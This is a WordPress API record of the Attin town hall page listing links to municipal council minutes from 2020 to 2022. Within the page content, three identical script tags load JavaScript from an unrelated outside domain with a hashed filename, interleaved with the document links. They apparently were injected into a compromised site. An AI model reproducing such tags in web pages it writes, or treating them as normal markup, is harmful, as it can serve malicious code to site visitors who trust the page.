{"id":1766,"date":"2017-05-11T10:32:50","date_gmt":"2017-05-11T09:32:50","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=1766"},"modified":"2022-10-22T16:24:08","modified_gmt":"2022-10-22T15:24:08","slug":"deliberations-du-conseil-municipal","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=1766","title":{"rendered":"D\u00e9lib\u00e9rations du Conseil Municipal"},"content":{"rendered":"<h3>&nbsp;<\/h3>\n<h3><span style=\"color: #000000;\">&nbsp;<\/span><\/h3>\n<h3><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/06\/cm-28-mai-2020.pdf\">cm 28 mai 2020<\/a><\/span><\/h3>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/12\/dcm-9-sept-2020.pdf\">dcm 9 sept 2020<\/a><\/p>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/12\/dcm16-sept-2020.pdf\">dcm16 sept 2020<\/a><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<h3><span style=\"color: #000000;\"><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2021\/01\/compte-rendu-du-1-d\u00e9cembre-2020.pdf\">dcm du 1 d\u00e9cembre 2020<\/a><\/span><\/h3>\n<h3><span style=\"color: #000000;\"><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2021\/03\/dcm-9-f\u00e9vrier-2021.pdf\">dcm 9 f\u00e9vrier 2021<\/a><\/span><\/h3>\n<h3><span style=\"color: #000000;\"><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2021\/05\/compte-rendu-du-13-avril-2021.pdf\">compte rendu du 13 avril 2021<\/a><\/span><\/h3>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2021\/10\/compte-rendu-du-22-septembre-2021.pdf\">compte rendu du 22 septembre 2021<\/a><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2022\/03\/compte-rendu-du-21-d\u00e9cembre-2021-1.pdf\">compte rendu du 21 d\u00e9cembre 2021-1<\/a><\/p>\n<h3><span style=\"color: #000000;\"><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2022\/10\/compte-rendu-du-29-mars-2022.pdf\">compte rendu du 29 mars 2022<\/a><\/span><\/h3>\n<h3><span style=\"color: #000000;\"><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2022\/10\/compte-rendu-du-29-juin-2022.pdf\">compte rendu du 29 juin 2022<\/a>&nbsp;<\/span><\/h3>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; &nbsp; cm 28 mai 2020 dcm 9 sept 2020 dcm16 sept 2020 dcm du 1 d\u00e9cembre 2020 dcm 9 f\u00e9vrier 2021 compte rendu du 13 avril 2021 compte rendu du 22 septembre 2021 compte rendu du 21 d\u00e9cembre 2021-1 compte rendu du 29 mars 2022 compte rendu du 29 juin 2022&nbsp; &nbsp; &nbsp; &nbsp;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1766","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/1766","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1766"}],"version-history":[{"count":12,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/1766\/revisions"}],"predecessor-version":[{"id":2629,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/1766\/revisions\/2629"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1766"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}